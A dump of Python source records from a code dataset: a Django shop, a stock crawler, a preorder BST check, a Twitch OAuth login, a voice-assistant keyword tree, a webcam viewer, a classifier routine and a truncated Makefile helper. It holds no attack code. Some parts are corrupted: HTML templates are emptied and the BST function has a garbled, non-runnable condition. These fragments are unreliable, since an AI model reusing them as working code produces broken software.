pk=int(request.session[\"active_cart\"]))\n cursor = connection.cursor()\n cursor.execute(\"SELECT i.quantity, p.title, p.price FROM cart_items AS i, products AS p WHERE i.product_id = p.id AND cart_id = %d\" % cart.id)\n cart_products = dictfetchall(cursor)\n\n return render_to_response('cart.html', locals(), context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login')\n@csrf_protect\ndef shop(request):\n products_dict = dict()\n mproducts = ModelProduct.objects.filter(active=True)\n for mp in mproducts:\n products = Product.objects.filter(active=True, mp=mp)\n for pr in products:\n if mp.key() not in products_dict.keys():\n products_dict[mp.key()] = list()\n products_dict[mp.key()].append({'id': pr.id, 'title': pr.title, 'value': pr.value, 'price': pr.price, 'currency': pr.currency})\n\n return render_to_response('shop.html', locals(), context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login')\n@csrf_protect\ndef to_cart(request):\n data = dict()\n if request.is_ajax():\n client = get_object_or_404(Client, user=request.user)\n if \"active_cart\" in request.session:\n cart = get_object_or_404(Cart, pk=int(request.session[\"active_cart\"]))\n else:\n cart = Cart.objects.create(client=client)\n request.session[\"active_cart\"] = cart.id\n\n product_id = int(request.POST.get('product', None))\n if cart.add_product(product_id):\n status = True\n else:\n status = False\n\n data = {'status': status}\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n","sub_path":"apps/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"310585890","text":"import csv\r\nimport time\r\nimport os.path\r\nimport threading\r\n\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup\r\n\r\nfile_dir = os.path.dirname(os.path.realpath(__file__))\r\nHTML_TEMPLATE = '''\r\n\r\n\r\n\r\n \r\n \r\n \r\n Document\r\n \r\n\r\n\r\n
\r\n {}\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {}\r\n \r\n
시각000510152025303540455055
\r\n
\r\n
\r\n \r\n
\r\n \r\n\r\n\r\n'''\r\nHTML_TEMPLATE2 = '''\r\n\r\n\r\n\r\n \r\n \r\n \r\n Document\r\n \r\n\r\n\r\n
\r\n {}\r\n
\r\n\r\n\r\n'''\r\n\r\n\r\nclass Worker:\r\n def __init__(self, url):\r\n self.url = url\r\n self.num = url.split('/')[-1]\r\n self.name = None\r\n self.stack = None\r\n self.image = None\r\n\r\n def load_stock(self):\r\n _header = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',\r\n }\r\n\r\n res = req.get(self.url, headers=_header)\r\n if res.status_code != 200:\r\n print(f'[{self.num}] HTTP Error: {res.status_code}')\r\n\r\n parser = BeautifulSoup(res.text, \"html.parser\")\r\n self.name = parser.find('meta', {'property': 'og:title'}).get('content').strip()\r\n self.stack = bool('out' not in parser.find('meta', {'property': 'og:availability'}).get('content').strip())\r\n self.image = parser.find('meta', {'property': 'og:images'}).get('content').strip().replace('/b/', '/l/')\r\n\r\n def write_csv(self):\r\n init = bool(not os.path.isfile(f'{file_dir}/data/{self.num}.csv'))\r\n\r\n with open(f'{file_dir}/data/{self.num}.csv', 'a', encoding='utf-8', newline='') as file:\r\n writer = csv.writer(file)\r\n\r\n if init:\r\n writer.writerow(['날짜', '시각', '재고'])\r\n\r\n writer.writerow([time.strftime('%m/%d'), time.strftime('%H:%M'), 'O' if self.stack else 'X'])\r\n\r\n def make_html(self):\r\n with open(f'{file_dir}/data/{self.num}.csv', 'r', encoding='utf-8', newline='') as file:\r\n reader = csv.DictReader(file)\r\n result = []\r\n temp = {}\r\n c_time = None\r\n b_time = None\r\n\r\n for row in reader:\r\n times = row['시각'].split(':')\r\n c_time = f\"{row['날짜']} {times[0]}시\"\r\n if b_time is not None and c_time != b_time:\r\n result.append([b_time, temp])\r\n temp = {}\r\n\r\n temp[times[1]] = row['재고']\r\n\r\n b_time = c_time\r\n\r\n result.append([b_time, temp])\r\n\r\n table = ''\r\n for e in result:\r\n text = f'{e[0]}'\r\n\r\n for i in range(0, 60, 5):\r\n data = e[1].get(f'{i:02}')\r\n\r\n if data is None:\r\n text += ''\r\n elif data == 'O':\r\n text += 'O'\r\n else:\r\n text += 'X'\r\n\r\n text += '\\n'\r\n\r\n table += text\r\n\r\n with open(f'{file_dir}/data/{self.num}.html', 'w', encoding='utf-8') as file:\r\n file.write(HTML_TEMPLATE.format(self.url, self.name, table))\r\n\r\n def main(self):\r\n self.load_stock()\r\n self.write_csv()\r\n self.make_html()\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n os.mkdir(f'{file_dir}/data')\r\n except FileExistsError:\r\n pass\r\n\r\n with open(f'{file_dir}/list.txt', 'r', encoding='utf-8') as file:\r\n products = [l.strip() for l in file.readlines()]\r\n\r\n workers = []\r\n for url in products:\r\n worker = Worker(url)\r\n workers.append(worker)\r\n th = threading.Thread(target=worker.main)\r\n th.start()\r\n\r\n while threading.active_count() > 1:\r\n time.sleep(0.05)\r\n\r\n with open(f'{file_dir}/products.html', 'w', encoding='utf-8') as file:\r\n grid = ''\r\n for worker in workers:\r\n grid += f'\\n'\r\n\r\n file.write(HTML_TEMPLATE2.format(grid))\r\n","sub_path":"크롤링 6:27회의/선재/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211005826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 08:35:28 2020\n\n@author: mahya\n\"\"\"\n\n\ndef canReperesentPBT(pre):\n \n root = 0\n s = []\n \n for element in pre:\n \n if element 0 and s[-1] < element):\n root = s.pop()\n \n s.append(element)\n \n return True\n\npre1 = [40 , 30 , 35 , 20 , 80 , 100]\npre2 = [40 , 30 , 35 , 20 , 80 , 100]\n\nprint(canReperesentPBT(pre1))\nprint(canReperesentPBT(pre2))","sub_path":"PreorderBinaryTree.py","file_name":"PreorderBinaryTree.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"473658785","text":"import functools\nimport urllib.request\nimport urllib.parse\nimport uuid\n\nimport flask\nimport flask.json\n\nfrom common import utils\nfrom www import server\nfrom common.config import config, from_apipass\n\n# See https://github.com/justintv/Twitch-API/blob/master/authentication.md#scopes\n# We don't actually need, or want, any at present\nREQUEST_SCOPES = []\n\nSPECIAL_USERS = {\n\t'lrrbot': ['chat_login', 'user_read', 'user_follows_edit'],\n\t'loadingreadyrun': ['channel_subscriptions'],\n}\n\n# Needs to be the URI of this script, and also the registered URI for the app\nREDIRECT_URI = 'https://lrrbot.mrphlip.com/login'\n#REDIRECT_URI = 'http://localhost:5000/login'\n\ndef with_session(func):\n\t\"\"\"\n\tPass the current login session information to the function\n\n\tUsage:\n\t@server.app.route('/path')\n\t@with_session\n\tdef handler(session): # keyword argument must be \"session\"\n\t\t...\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tkwargs['session'] = load_session()\n\t\treturn func(*args, **kwargs)\n\treturn wrapper\n\ndef with_minimal_session(func):\n\t\"\"\"\n\tPass the current login session information to the function\n\n\tDo not include extra session information, intended for master.html. Useful for\n\tplaces that need the current user id, but shouldn't (or don't need to) call\n\tbotinteract.\n\n\tUsage:\n\t@server.app.route('/path')\n\t@with_minimal_session\n\tdef handler(session):\n\t\t...\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tkwargs['session'] = load_session(include_url=False, include_header=False)\n\t\treturn func(*args, **kwargs)\n\treturn wrapper\n\ndef require_login(func):\n\t\"\"\"\n\tLike with_session, but if the user isn't logged in,\n\tsend them via the login screen.\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tsession = load_session()\n\t\tif session['user']:\n\t\t\tkwargs['session'] = session\n\t\t\treturn func(*args, **kwargs)\n\t\telse:\n\t\t\treturn login(session['url'])\n\treturn wrapper\n\ndef require_mod(func):\n\t\"\"\"\n\tLike with_session, but if the user isn't logged in,\n\tsend them via the login screen. If the user isn't\n\ta moderator, kick them out.\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tsession = load_session()\n\t\tif session['user']:\n\t\t\tkwargs['session'] = session\n\t\t\tif session['header']['is_mod']:\n\t\t\t\treturn func(*args, **kwargs)\n\t\t\telse:\n\t\t\t\treturn flask.render_template('require_mod.html', session=session)\n\t\telse:\n\t\t\treturn login(session['url'])\n\treturn wrapper\n\ndef load_session(include_url=True, include_header=True):\n\t\"\"\"\n\tGet the login session information from the cookies.\n\n\tIncludes all the information needed by the master.html template.\n\t\"\"\"\n\tfrom www import botinteract\n\t# could potentially add other things here in the future...\n\tsession = {\n\t\t\"user\": flask.session.get('user'),\n\t}\n\tif 'apipass' in flask.request.values and flask.request.values['apipass'] in from_apipass:\n\t\tsession['user'] = from_apipass[flask.request.values[\"apipass\"]]\n\tif include_url:\n\t\tsession['url'] = flask.request.url\n\telse:\n\t\tsession['url'] = None\n\tif include_header:\n\t\tsession['header'] = botinteract.get_header_info()\n\treturn session\n\n@server.app.route('/login')\ndef login(return_to=None):\n\tif 'code' not in flask.request.values:\n\t\tif return_to is None:\n\t\t\treturn_to = flask.request.values.get('return_to')\n\t\tflask.session['login_return_to'] = return_to\n\n\t\tif 'as' in flask.request.values:\n\t\t\tif flask.request.values['as'] not in SPECIAL_USERS:\n\t\t\t\treturn utils.error_page(\"Not a recognised user name: %s\" % flask.request.values['as'])\n\t\t\tscope = SPECIAL_USERS[flask.request.values['as']]\n\t\telse:\n\t\t\tscope = REQUEST_SCOPES\n\n\t\t# Generate a random nonce so we can verify that the user who comes back is the same user we sent away\n\t\tflask.session['login_nonce'] = uuid.uuid4().hex\n\n\t\treturn flask.render_template(\"login.html\", clientid=config[\"twitch_clientid\"], scope=' '.join(scope), redirect_uri=REDIRECT_URI, nonce=flask.session['login_nonce'], session=load_session(include_url=False))\n\telse:\n\t\ttry:\n\t\t\t# Check that we're expecting the user to be logging in...\n\t\t\texpected_nonce = flask.session.pop('login_nonce', None)\n\t\t\tif not expected_nonce:\n\t\t\t\traise Exception(\"Not expecting a login here\")\n\n\t\t\ttwitch_state = flask.request.values.get('state', '')\n\t\t\t# We have to pack the \"remember me\" flag into the state parameter we send via twitch, since that's where the form points... awkward\n\t\t\tif ':' in twitch_state:\n\t\t\t\ttwitch_nonce, remember_me = twitch_state.split(':')\n\t\t\t\tremember_me = bool(int(remember_me))\n\t\t\telse:\n\t\t\t\t# User didn't have JS turned on, so remember me option not available\n\t\t\t\ttwitch_nonce = twitch_state\n\t\t\t\tremember_me = False\n\t\t\tif expected_nonce != twitch_nonce:\n\t\t\t\traise Exception(\"Nonce mismatch: %s vs %s\" % (expected_nonce, twitch_nonce))\n\n\t\t\t# Call back to Twitch to get our access token\n\t\t\toauth_params = {\n\t\t\t\t'client_id': config[\"twitch_clientid\"],\n\t\t\t\t'client_secret': config[\"twitch_clientsecret\"],\n\t\t\t\t'grant_type': 'authorization_code',\n\t\t\t\t'redirect_uri': REDIRECT_URI,\n\t\t\t\t'code': flask.request.values['code'],\n\t\t\t}\n\t\t\tres_json = urllib.request.urlopen(\"https://api.twitch.tv/kraken/oauth2/token\", urllib.parse.urlencode(oauth_params).encode()).read().decode()\n\t\t\tres_object = flask.json.loads(res_json)\n\t\t\tif not res_object.get('access_token'):\n\t\t\t\traise Exception(\"No access token from Twitch: %s\" % res_json)\n\t\t\taccess_token = res_object['access_token']\n\t\t\tgranted_scopes = res_object[\"scope\"]\n\n\t\t\t# Use that access token to get basic information about the user\n\t\t\treq = urllib.request.Request(\"https://api.twitch.tv/kraken/\")\n\t\t\treq.add_header(\"Authorization\", \"OAuth %s\" % access_token)\n\t\t\tres_json = urllib.request.urlopen(req).read().decode()\n\t\t\tres_object = flask.json.loads(res_json)\n\t\t\tif not res_object.get('token', {}).get('valid'):\n\t\t\t\traise Exception(\"User object not valid: %s\" % res_json)\n\t\t\tif not res_object.get('token', {}).get('user_name'):\n\t\t\t\traise Exception(\"No user name from Twitch: %s\" % res_json)\n\t\t\tuser_name = res_object['token']['user_name'].lower()\n\n\t\t\t# If this is one of our special users, store the access_token in the bot\n\t\t\t# for future use\n\t\t\t# If one of our special users logged in *without* using the \"as\" flag,\n\t\t\t# Twitch *might* remember them and give us the same permissions anyway\n\t\t\t# but if not, then we don't have the permissions we need to do our thing\n\t\t\t# so bounce them back to the login page with the appropriate scopes.\n\t\t\tif user_name in SPECIAL_USERS:\n\t\t\t\tif any(i not in granted_scopes for i in SPECIAL_USERS[user_name]):\n\t\t\t\t\tserver.app.logger.error(\"User %s has not granted us the required permissions\" % user_name)\n\t\t\t\t\tflask.session['login_nonce'] = uuid.uuid4().hex\n\t\t\t\t\treturn flask.render_template(\"login.html\", clientid=config[\"twitch_clientid\"], scope=' '.join(SPECIAL_USERS[user_name]), redirect_uri=REDIRECT_URI, nonce=flask.session['login_nonce'], session=load_session(include_url=False), special_user=user_name, remember_me=remember_me)\n\t\t\t\tfrom www import botinteract\n\t\t\t\tbotinteract.set_data([\"twitch_oauth\", user_name], access_token)\n\n\t\t\t# Store the user name into the session\n\t\t\t# Note: we DON'T store the access_token in the session, as the session contents\n\t\t\t# are user-visible (for the default Flask implementation) and the token needs\n\t\t\t# to be kept secret. And we don't need it for anything other than verifying the\n\t\t\t# user name anyway, for non-special users.\n\t\t\tflask.session['user'] = user_name\n\t\t\tflask.session.permanent = remember_me\n\n\t\t\treturn_to = flask.session.pop('login_return_to', None)\n\t\t\treturn flask.render_template(\"login_response.html\", success=True, return_to=return_to, session=load_session(include_url=False))\n\t\texcept:\n\t\t\tserver.app.logger.exception(\"Exception in login\")\n\t\t\treturn flask.render_template(\"login_response.html\", success=False, session=load_session(include_url=False))\n\n@server.app.route('/logout')\ndef logout():\n\tif 'user' in flask.session:\n\t\tdel flask.session['user']\n\tsession = load_session(include_url=False)\n\treturn flask.render_template(\"logout.html\", return_to=flask.request.values.get('return_to'), session=session)\n","sub_path":"www/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102085970","text":"import os\n\nfrom kinto.core.decorators import cache_forever\n\nHERE = os.path.dirname(__file__)\n\n\n# Configured home page\n@cache_forever\ndef admin_home_view(request):\n try:\n with open(os.path.join(HERE, 'build/index.html')) as f:\n page_content = f.read()\n except FileNotFoundError: # pragma: no cover\n with open(os.path.join(HERE, 'public/help.html')) as f:\n page_content = f.read()\n return page_content\n","sub_path":"kinto/plugins/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"540963367","text":"\"\"\"\nTommy virtual assistant core module\n\"\"\"\nimport hashlib, json\nfrom config.settings import LOAD_MODULES, TOMMY_ROOT, LANG\nfrom tommy.core.tprotocol import TResponse\n\n\nclass Tommy:\n\t\"\"\"\n\tTommy class\n\tTommy virtual assistant is an instance of this class\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tConstruct the tommy's keywords tree\n\t\t\"\"\"\n\t\tself.tree = Node(None)\n\n\t\tfor module in LOAD_MODULES:\n\t\t\twith open(TOMMY_ROOT + 'modules/{}/keywords/keywords_{}.json'.format(module, LANG)) as keywords_file:\n\t\t\t\tkeywords_json = json.load(keywords_file)\n\n\t\t\tfor method, content in keywords_json.items():\n\t\t\t\tfor call in content['calls']:\n\t\t\t\t\tcurrent_node = self.tree\n\t\t\t\t\tfor keyword in call['keywords']:\n\t\t\t\t\t\tif keyword == '%p':\n\t\t\t\t\t\t\tcurrent_node.add_child(Node(\"%p\", is_variable=True))\n\t\t\t\t\t\t\tcurrent_node = current_node.get_child(\"%p\")\n\t\t\t\t\t\telif current_node.has_child(keyword):\n\t\t\t\t\t\t\tcurrent_node = current_node.get_child(keyword)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcurrent_node.add_child(Node(keyword))\n\t\t\t\t\t\t\tcurrent_node = current_node.get_child(keyword)\n\t\t\t\t\tcurrent_node.module = module\n\t\t\t\t\tcurrent_node.method = method\n\t\t\t\t\tcurrent_node.is_callable = True\n\n\tdef process(self, trequest):\n\t\t\"\"\"\n\t\tFind the correct module and method to call from a trequest\n\t\t:param trequest: TRequest sended by user\n\t\t:type trequest: TRequest\n\t\t\"\"\"\n\t\tkeywords = trequest.splited_text\n\t\tcurrent_node = self.tree\n\n\t\tin_variable = False\n\t\tfor keyword in keywords:\n\t\t\tif current_node.has_child(keyword):\n\t\t\t\tcurrent_node = current_node.get_child(keyword)\n\t\t\t\tin_variable = False\n\t\t\telse:\n\t\t\t\tif in_variable:\n\t\t\t\t\tnext\n\t\t\t\telse:\n\t\t\t\t\tif current_node.has_child(\"%p\"):\n\t\t\t\t\t\tcurrent_node = current_node.get_child(\"%p\")\n\t\t\t\t\t\tin_variable = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tbreak\n\n\t\tif current_node.is_callable:\n\t\t\tmodule = __import__('modules.{}.core'.format(current_node.module),\n\t\t\t\t\t\t\t\tfromlist=[None]) # I don't understant that fromlist\n\t\t\tmethod = getattr(module.Core(), current_node.method)\n\t\t\ttresponse = method(keywords)\n\t\t\ttresponse.trequest = trequest\n\t\t\treturn tresponse\n\t\telse:\n\t\t\treturn TResponse(\"Sorry I don't understand\", trequest)\n\n\nclass Node:\n\t\"\"\"\n\tA node of the Tommy keywords tree\n\t\"\"\"\n\n\tdef __init__(self, word, *childs, is_variable=False, is_callable=False, module=None, method=None):\n\t\t\"\"\"\n\t\tCreate a node, set the word associated and the child nodes\n\t\t:param word: The word represented by the node\n\t\t:param childs: Child nodes (list of another nodes)\n\t\t\"\"\"\n\t\tself.word = word\n\t\tif word:\n\t\t\tself.fingerprint = hashlib.sha1(str.encode(self.word)).hexdigest()\n\t\tself.childs = list(childs)\n\t\tself.is_variable = is_variable\n\t\tself.is_callable = is_callable\n\t\tself.module = module\n\t\tself.method = method\n\n\tdef has_childs(self):\n\t\t\"True if current node has childs\"\n\t\treturn len(self.childs) > 0\n\n\tdef has_child(self, word):\n\t\t\"\"\"True if the node has a child associated with word\"\"\"\n\t\tfor child in self.childs:\n\t\t\tif child.word == word: return True\n\t\treturn False\n\n\tdef get_child(self, word):\n\t\t\"\"\"Get a node's child using a word\"\"\"\n\t\tfor child in self.childs:\n\t\t\tif child.word == word: return child\n\t\treturn None\n\n\tdef add_child(self, child):\n\t\t\"\"\"Add a child to the current node\"\"\"\n\t\tself.childs.append(child)","sub_path":"tommy/core/tommy.py","file_name":"tommy.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"71842730","text":"from webcamvideostream import WebcamVideoStream\nimport os\nimport time\nimport operator\nimport imutils\n\nimport cv2\nimport numpy as np\n\nCOPYMAIN = True\n\nDISPLAY_INFO = False\nDISPLAY_GRID = False\nDISPLAY_MASK = True\nDISPLAY_FREG = False\n\nif COPYMAIN:\n # Copy values from the main program\n from run_LSTM_track import CAMERA\n from run_LSTM_track import ROTATE\n from run_LSTM_track import PMASK\n from run_LSTM_track import FREG\n from run_LSTM_track import FCAMCP\n from run_LSTM_track import FCAMDS\n from run_LSTM_track import FCOFF\nelse:\n # CAMERA = [0, 1, 2, 3]\n CAMERA = [cv2.CAP_DSHOW + 1] # Using directshow to fix black bar\n # CAMERA = [ \"rtsp://167.205.66.147:554/onvif1\"\n # \"rtsp://167.205.66.148:554/onvif1\",\n # \"rtsp://167.205.66.149:554/onvif1\",\n # \"rtsp://167.205.66.150:554/onvif1\"]\n\n PMASK = [ np.array([[290,200],[0,0],[430,0],[327,157]], np.int32), # NE\n np.array([[760,200],[880,288],[1024,134],[985,44]], np.int32), # NW\n np.array([[185,430],[255,470],[70,570],[0,575],[0,300]], np.int32), # SE\n np.array([[610,520],[770,430],[960,576],[660,576]], np.int32) # SW\n ] \n \n FREG = [288+0, 288+100, 512+125, 512+340] \n \nclass main_video:\n def preprocess(raws, rots):\n imgs = []\n for raw, rot in zip(raws, rots):\n img = raw\n # img = cv2.resize(img, dsize=(256, 144), interpolation=cv2.INTER_CUBIC) # 16:9\n img = cv2.resize(img, dsize=(512, 288), interpolation=cv2.INTER_CUBIC) # 16:9\n # img = cv2.resize(img, dsize=(320, 240), interpolation=cv2.INTER_CUBIC) # 4:3\n # img = cv2.resize(img, dsize=(160, 120), interpolation=cv2.INTER_CUBIC) # 4:3\n img = imutils.rotate_bound(img, rot)\n\n imgs.append(img)\n \n if len(imgs) == 1:\n image = imgs[0]\n if len(imgs) >= 2:\n image = np.hstack((imgs[0], imgs[1]))\n if len(imgs) >= 4: # Four images boxed\n image2 = np.hstack((imgs[2], imgs[3]))\n image = np.vstack((image, image2))\n \n return imgs, image\n \n def __init__(self, camera=CAMERA):\n fps_time = 0\n frame = 0\n avg_fps = 0\n his_fps = []\n \n # cams = [WebcamVideoStream(src=cam).start() for cam in camera]\n cams = [WebcamVideoStream(src=cam, resolution=(1280,720)).start() for cam in camera]\n \n # h, w, c = image_raw.shape\n # h2, w2, c2 = image2_raw.shape\n \n # print(h, w, c, h2, w2, c2)\n \n \n # Main loop\n while True:\n imgs = []\n \n for i, cam in enumerate(cams):\n img = cam.read()\n \n print(cam.grabbed, end=\" \")\n \n # If no image is acquired\n if (img is None):\n # Black image\n imgs.append(np.zeros((100,100,3), np.uint8))\n elif (img.size == 0):\n imgs.append(np.zeros((100,100,3), np.uint8))\n else:\n imgs.append(img)\n \n if(imgs is not [None]):\n imgs, image = main_video.preprocess(imgs, ROTATE)\n \n if len(imgs) == 5:\n im_h, im_w = imgs[4].shape[:2]\n imf = imgs[4][round(im_h*FCAMCP[0]): round(im_h*FCAMCP[1]), round(im_w*FCAMCP[2]): round(im_w*FCAMCP[3])] # Crop\n im_h, im_w = imf.shape[:2]\n imf = cv2.resize(imf, dsize=(round(im_w/FCAMDS), round(im_h/FCAMDS)), interpolation=cv2.INTER_CUBIC) # Downsample\n im_h, im_w = imf.shape[:2]\n ky = 0 if im_h % 2 == 0 else 1\n kx = 0 if im_w % 2 == 0 else 1\n freg = [round(FCOFF[1]-im_h/2), round(FCOFF[1]+im_h/2)+ky, round(FCOFF[0]-im_w/2), round(FCOFF[0]+im_w/2)+kx]\n \n image[freg[0]:freg[1], freg[2]:freg[3]] = imf # Insert to the center\n \n fps = 1.0 / (time.time() - fps_time)\n fps_time = time.time()\n \n print(\"%.2f\" % fps)\n his_fps.append(fps)\n \n frame += 1\n if frame > 120:\n avg_fps = sum(his_fps) / len(his_fps)\n frame = 0\n his_fps = []\n \n # self.display_all(image, fps)\n self.display_all(image, avg_fps)\n \n if cv2.waitKey(1) == 27:\n break\n else:\n print(\"Empty image\")\n time.sleep(.5)\n \n cv2.destroyAllWindows()\n \n def display_all(self, image, fps):\n \n h, w, c = image.shape\n print(w,h,c, end=\" \")\n \n if DISPLAY_MASK:\n for pmask in PMASK:\n cv2.fillPoly(image, [pmask], color=(0,0,0))\n \n if DISPLAY_FREG:\n cv2.rectangle(image, (FREG[2], FREG[0]), (FREG[3], FREG[1]), color=(64,64,64), thickness=1)\n \n if DISPLAY_INFO:\n cv2.putText(image,\n \"FPS: %f\" % fps,\n (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (0, 255, 0), 2)\n cv2.putText(image,\n \"RES: %dx%d\" % (w, h),\n (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\n (0, 255, 0), 2)\n \n if DISPLAY_GRID:\n grid_clr = (0, 255, 0)\n grid_thick = 1\n cv2.line(image, (0, round(h/4)), (w, round(h/4)), (0,255,0), 1)\n cv2.line(image, (0, round(h*3/4)), (w, round(h*3/4)), (0,255,0), 1)\n cv2.line(image, (round(w/4), 0), (round(w/4), h), (0,255,0), 1)\n cv2.line(image, (round(w*3/4), 0), (round(w*3/4), h), (0,255,0), 1)\n \n cv2.imshow('Bedssys', image)\n \nif __name__ == '__main__':\n main_video()\n\n","sub_path":"run_threads_stats.py","file_name":"run_threads_stats.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479235757","text":"import inout\nfrom classification import Classifier, Dataset, DatasetEntry\nfrom db import Dbinterface\nfrom db.models import Diario_Classificacao, Diario_Backlisted, Contrato, Predicao_Contrato\nfrom pln import Preprocessor\n\nimport numpy as np\nimport re\nfrom sqlalchemy import cast, Numeric\n\n\n##\n# utils\n\ndef remove_numbers(text):\n return re.sub(r'\\S*\\d\\S*', ' ', text)\n\n\n##\n# getting data\n\nappconfig = inout.read_yaml('./appconfig')\nstopwords = inout.read_json('./stopwords')\nclassifier_params = inout.read_json(appconfig['classification']['params_filepath'])\n\ndbi = Dbinterface(appconfig['db']['connectionstring'])\n\nprint('retrieving data')\nwith dbi.opensession() as session:\n\n blacklist = list(session.query(Diario_Backlisted.palavra))\n\n # get crowdsourced data\n training_dataset = session.query(Diario_Classificacao).filter(Diario_Classificacao.classe_id.in_(appconfig['classification']['allowed_classes']))\n training_dataset = Dataset([DatasetEntry(publicacao.id, remove_numbers(publicacao.corpo), publicacao.classe_id) for publicacao in training_dataset])\n\n # get data to predict\n contratos = session.query(Contrato).filter(cast(Contrato.ValorFirmado, Numeric(14,2)) > appconfig['classification']['min_value'])\n\n\nto_predict = [(contrato.id, contrato.objeto) for contrato in contratos]\nblacklist = stopwords + [entry[0] for entry in blacklist]\n\n\n##\n# preparing preprocessing and classification tools\n\nprep = Preprocessor()\n\n# preprocess my stopwords (blacklist). Scikit will remove stopwords AFTER the tokenization process (and i preprocess my tokens in the tokenization process)\n# source: https://github.com/scikit-learn/scikit-learn/blob/a24c8b46/sklearn/feature_extraction/text.py#L265\nblacklist = [prep.stem(prep.strip_accents(prep.lowercase(token))) for token in blacklist]\n\ndomain_params = {'vectorizer__tokenizer': prep.build_tokenizer(), 'classifier__random_state': appconfig['random_state']}\nclassifier = Classifier({**classifier_params, **domain_params}, blacklist)\n\n\n##\n# classifying\n\nprint('classifying contratos')\n\nclassifier.train(training_dataset.data, training_dataset.target)\n\nids, corpus = zip(*to_predict)\npredictions = classifier.predict(corpus)\nresults = zip(ids, predictions)\n\n\n##\n# persisting\n\nprint('persisting results')\nwith dbi.opensession() as session:\n\n # clean old entries\n session.query(Predicao_Contrato).delete()\n session.flush()\n\n # insert predicoes\n for result in results:\n predicao = Predicao_Contrato(id=result[0], classe=np.asscalar(result[1]))\n session.add(predicao)\n\n session.commit()\n","sub_path":"routine_predict_classes.py","file_name":"routine_predict_classes.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"333359399","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\n##########################################\n#\n# base on GNU make ver 4.1+\n#\n##########################################\n\nimport subprocess\nimport pymysql\nimport sys,re,os,getpass\n\n##########################################\n#\t- read_config\n#\n#\tread config file and get options\n#\t(Make version, language, verbose, keep_on, parsing message).\n#\n##########################################\ndef read_config():\n\tglobal verbose,keep_on,quiet\n\tglobal make_version,config\n\tglobal line_num_msg,symbol_msg,path_msg\n\tlanguage = \"eng\"\n\ttry:\n\t\tif config[0]=='~':\n\t\t\tconfig = os.path.expanduser('~')+config[1:]\n\t\tconfig_file = open(config,\"r\")\n\t\tlines = config_file.readlines()\n\t\tfor idx,line in enumerate(lines):\n\t\t\tif line.startswith(\"MAKE_VERSION=\"):\n\t\t\t\tmake_version = line[len(\"MAKE_VERSION=\"):].replace(\"\\n\",\"\")\n\t\t\telif line.startswith(\"MAKE_LANGUAGE=\"):\n\t\t\t\tif line[len(\"MAKE_LANGUAGE=\"):].lower().startswith(\"kor\"):\n\t\t\t\t\tlanguage = \"kor\"\n\t\t\telif line.startswith(\"KEEP_ON=\"):\n\t\t\t\tif line[len(\"KEEP_ON=\"):].lower().startswith(\"true\"):\n\t\t\t\t\tkeep_on = True\n\t\t\telif line.startswith(\"VERBOSE=\"):\n\t\t\t\tif line[len(\"VERBOSE=\"):].lower().startswith(\"false\"):\n\t\t\t\t\tverbose = False\n\t\t\telif line.startswith(\"[version {} - {}]\".format(make_version,language)):\n\t\t\t\tfor i in range(idx+1,idx+4):\n\t\t\t\t\tif lines[i].startswith(\"symbol: \"):\n\t\t\t\t\t\tsymbol_msg = lines[i].replace(\"\\n\",\"\")[len(\"symbol: \"):]\n\t\t\t\t\telif lines[i].startswith(\"line_num: \"):\n\t\t\t\t\t\tline_num_msg = lines[i].replace(\"\\n\",\"\")[len(\"line_num: \"):]\n\t\t\t\t\telif lines[i].startswith(\"path: \"):\n\t\t\t\t\t\tpath_msg = lines[i].replace(\"\\n\",\"\")[len(\"path: \"):]\n\t\t\t\tbreak\n\t\tconfig_file.close()\n\t\tif(not quiet):\n\t\t\tprint(\"[Makefile observer] [Make {} - {}] verbose:{}\".format(make_version,language,verbose))\n\t\t\tprint(\"[Makefile observer] config file: {}\".format(config))\n\texcept:\n\t\tif(not quiet):\n\t\t\tprint(\"[Makefile observer] The config file doesn't exist: '{}'\".format(config))\n\t\t\tprint(\"[Makefile observer] continue with default setting [make 4.1 - eng]\")\n\t\tsymbol_msg = 